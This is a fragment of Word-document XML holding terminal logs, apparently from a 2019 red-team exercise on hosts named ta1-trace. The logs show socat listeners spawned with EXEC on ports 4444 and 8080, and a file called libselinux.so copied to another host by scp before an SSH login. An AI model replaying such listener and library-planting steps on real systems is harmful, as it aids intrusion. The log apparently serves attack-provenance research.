    <w:p w14:paraId="22B2B5C8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF476F3" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PWD=/home/admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09841216" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>LANG=en_US.UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB6863F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>SHLVL=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3748F7D4" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>SUDO_COMMAND=/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05584ACC" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>HOME=/home/admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273A323A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>LOGNAME=root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA5A4CC" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>LESSOPEN=| /usr/bin/lesspipe %s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B01C1F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>SUDO_GID=1003</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0633AE67" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>LESSCLOSE=/usr/bin/lesspipe %s %s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B6506E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>_=/usr/bin/env</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78384979" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2267AC08" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E3F7928" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6417F3F5" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>09:28</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F6E4BC" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>root@ta1-trace-2:~# socat TCP4-LISTEN:4444,reuseaddr,fork EXEC:cat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB1B4E5" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Fatal Python error: Py_Initialize: Unable to get the locale encoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B75A2AA" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>LookupError: no codec search functions registered: can't find encoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEE15C6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Aborted (core dumped)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC60161" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="492FC5C6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>09:29</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C3072F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>root@ta1-trace-2:~# exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF77022" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B95D54B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-trace-2:~$ env</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E246B58" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>XDG_SESSION_ID=12025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56370BA6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>TERM=screen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C6C2BD" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>SHELL=/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C298190" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>SSH_CLIENT=128.55.12.122 50634 22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5C2DED" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>SSH_TTY=/dev/pts/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5ADB48" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>USER=admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9B0823" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lz=01;31:*.xz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.axv=01;35:*.anx=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.axa=00;36:*.oga=00;36:*.spx=00;36:*.xspf=00;36:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C93FC49" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIL=/var/mail/admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444240A1" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB63E99" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PWD=/home/admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368C52D1" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>LANG=en_US.UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4051F098" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>SHLVL=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2287DACD" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>HOME=/home/admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E1AD4F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>LOGNAME=admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC28A6F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>SSH_CONNECTION=128.55.12.122 50634 128.55.12.118 22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E45C341" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>LESSOPEN=| /usr/bin/lesspipe %s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65606310" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>XDG_RUNTIME_DIR=/run/user/1003</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC53D78" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>LESSCLOSE=/usr/bin/lesspipe %s %s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D40A92" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>_=/usr/bin/env</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA6650C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="297F4751" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12DFAC9F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>09:29</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EDFA19" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-trace-2:~$ socat TCP4-LISTEN:8080,reuseaddr,fork EXEC:cat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A05C9D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Fatal Python error: Py_Initialize: Unable to get the locale encoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080DAA1C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>LookupError: no codec search functions registered: can't find encoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F43BB0F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Aborted (core dumped)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346BDB7B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28CFDDE5" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>09:30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4980565C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-trace-2:~$ exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7DDBCA" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>logout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0665C275" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Connection to 128.55.12.118 closed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E1AF77" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55151B1B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta51-bg-gen:~$ scp libselinux.so admin@128.55.12.117:.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BDC176" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">admin@128.55.12.117's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB39FDC" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">libselinux.so                                                                                                                                       100%   31KB  30.7KB/s   00:00 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3508AC84" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28CF0584" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>09:30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29137052" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta51-bg-gen:~$ ssh admin@128.55.12.117</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C8CBAF" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">admin@128.55.12.117's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573AE6DE" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic x86_64)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B7BAE1" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6888F040" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> * Documentation:  https://help.ubuntu.com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6875AF06" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05C868FA" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  System information as of Fri May 17 09:30:08 EDT 2019</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746FF298" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05BA9EC5" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  System load: 3.6                Memory usage: 65%   Processes:       266</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63698E42" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  Usage of /:  8.1% of 885.13GB   Swap usage:   3%    Users logged in: 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638357A3" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40C5E401" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  Graph this data and manage this system at:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C8C166" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    https://landscape.canonical.com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB02105" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01EFBB27" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>174 packages can be updated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EB74B9" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>130 updates are security updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E9C7D5" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EA41311" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Your Hardware Enablement Stack (HWE) is supported until April 2019.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177C411B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Last login: Fri May 17 09:23:16 2019 from 128.55.12.122</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DA58B1" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-trace-1:~$ ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17893467" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>acrylic          celebe             disobligation    haemophilic       messmen          out20             pisgah           rerival         superapologies   unfoughten</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AC0C71" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>adjuncts         chelicere          docs             halleflinta       metanitrophenol  out249            placement        restorationist  supposital       unify</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3466074B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>aethogen         chondropharyngeus  Documents        hauntingly        methene          out250            planospore       rove            suppressants     uniseriately</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4932A395" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>airbrush         cicalas            dogma            hemophthalmia     mignon           out514            polytype         saccharide      swiples          unloosen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BA7514" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>allayers         cilices            Downloads        herpetologist     minion           out559            potholes         sapropel        tabors           unmentioned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2A53F6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>allround         collyr             drumming         hosts             misconducting    out669            precopy          sarcoma         talonid          unrecreational</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E3DA16" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>anconeus         composita          dunny            hsperfdata_darpa  misinters        out680            preexception     satable         Templates        unsickered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2432500A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>ancylostomiasis  convincible        educt            imposted          molligrant       out724            preoccupiedness  savoring        tennantite       untempting</w:t>
